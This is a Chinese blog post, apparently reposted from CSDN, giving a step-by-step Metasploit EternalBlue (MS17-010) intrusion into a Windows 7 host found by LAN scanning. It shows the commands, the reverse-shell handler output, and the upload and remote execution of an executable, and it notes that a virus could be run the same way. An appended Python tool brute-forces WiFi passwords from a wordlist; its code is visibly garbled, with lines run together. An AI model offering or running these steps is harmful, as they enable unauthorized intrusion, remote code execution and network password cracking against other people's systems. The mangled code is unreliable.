0


Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录


前言

提示:这里可以添加本文要记录的大概内容:

我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。


提示:以下是本篇文章正文内容,下面案例可供参考

一、信息收集

第一步,信息收集
在这里插入图片描述
先查找自己的IP地址以方便查找同局域网的设备
在这里插入图片描述
然后使用nmap -O以一个一个扫
看我找到了什么
在这里插入图片描述
找到了,正好开放445端口
在这里插入图片描述

二、开始入侵

1.启动msfconsole

msfconsole

在这里插入图片描述
启动成功了,搜索ms漏洞

2.搜索漏洞

search ms17_010

然后扔给我们这些东西,以前用过的知道该使用哪个
在这里插入图片描述
输入:

use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述
看到这个样子就是成功了,然后我们执行下一步,查找要设置的参数,输入

options

在这里插入图片描述
yes是必须要设置的,no可以弄也可以不弄,我懒得弄了,
在这里插入图片描述
IP一定要设为目标的IP地址,然后我们再

options

在这里插入图片描述
已经都准备好了,可以进行入侵了,输入

run

在这里插入图片描述

[*] Started reverse TCP handler on 192.168.22.13:4444 

这串代码讲的是开始反向TCP监听,监听本机的IP和端口

192.168.22.196:445 -Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.22.196:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)[*] 192.168.22.196:445    - Scanned 1 of 1 hosts (100% complete)

这串代码讲的是主机存在漏洞
然后哇啦哇啦,一顿准备
在这里插入图片描述
出现win了,已经渗透成功了

3.文件上传

在这里插入图片描述
我送给它安装DEV-c++吧

upload /路径/xxx.exe

在这里插入图片描述
上传完了,但上传到哪里了呢?
输入

pwd

可以看到在system32文件下
让我们运行它
输入

execute -f xxx.exe

-f是运行指定文件
在这里插入图片描述
好吧,我的报错了,原因我改了文件,至少远程启动文件了,也可以发送病毒并执行

其他

from tkinter import*from pywifi import const
import pywifi
import time

defwificonnect(str, wifiname):# 窗口无线对象
    wifi = pywifi.PyWiFi()# 抓取第一个无线网卡
    ifaces = wifi.interfaces()[0]# 断开所有的wifi
    ifaces.disconnect()
    time.sleep(0)if ifaces.status()== const.IFACE_DISCONNECTED:# 创建wifi连接文件
        profile = pywifi.Profile()
        profile.ssid = wifiname
        # wifi的加密算法
        profile.akm.append(const.AKM_TYPE_WPA2PSK)# wifi的密码
        profile.key =str# 网卡的开发
        profile.auth = const.AUTH_ALG_OPEN
        # 加密单元,这里需要写点加密单元否则无法连接
        profile.cipher = const.CIPHER_TYPE_CCMP
        # 删除所有的wifi文件
        ifaces.remove_all_network_profiles()# 设置新的连接文件
        tep_profile = ifaces.add_network_profile(profile)# 连接
        ifaces.connect(tep_profile)
        time.sleep(1)if ifaces.status()== const.IFACE_CONNECTED:returnTrueelse:returnFalsedefreadPwd():# 获取wifi名称
    wifiname = entry.get().strip()
    path =r'./pwd.txt'file=open(path,'r')whileTrue:try:# 读取
            mystr =file.readline().strip()# 测试连接bool= wificonnect(mystr, wifiname)ifbool:
                text.insert(END,'这个密码是正确的'+ mystr)
                text.see(END)
                text.update()file.close()breakelse:
                text.insert(END,'这个密码是错误的'+ mystr)
                text.see(END)
                text.update()except:continue# 创建窗口
root = Tk()
root.title('wifi万能爆破器')
root.geometry('900x600')# 标签
label = Label(root, text='输入要爆破的WIFI:')# 定位
label.grid()# 输入控件
entry = Entry(root, font=('微软雅黑',20))
entry.grid(row=0, column=1)# 列表控件
text = Listbox(root, font=('微软雅黑',20), width=40, height=10)
text.grid(row=1, columnspan=15)# 按钮
button = Button(root, text='开始爆破', width=20, height=2, command=readPwd)
button.grid(row=2, columnspan=2)# 显示窗口
root.mainloop()

既然要联网肯定要联网,废话文学 这是我和chat gpt连夜写的,单纯只是密码爆破,嘿嘿
字典自己准备,网上一大堆,一搜一大把


总结

本文就是讲解远程控制并执行文件

标签: 安全 网络 运维

本文转载自: https://blog.csdn.net/m0_54471074/article/details/130447443
版权归原作者 Neatsuki 所有, 如有侵权,请联系我们删除。

“Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件”的评论:

还没有评论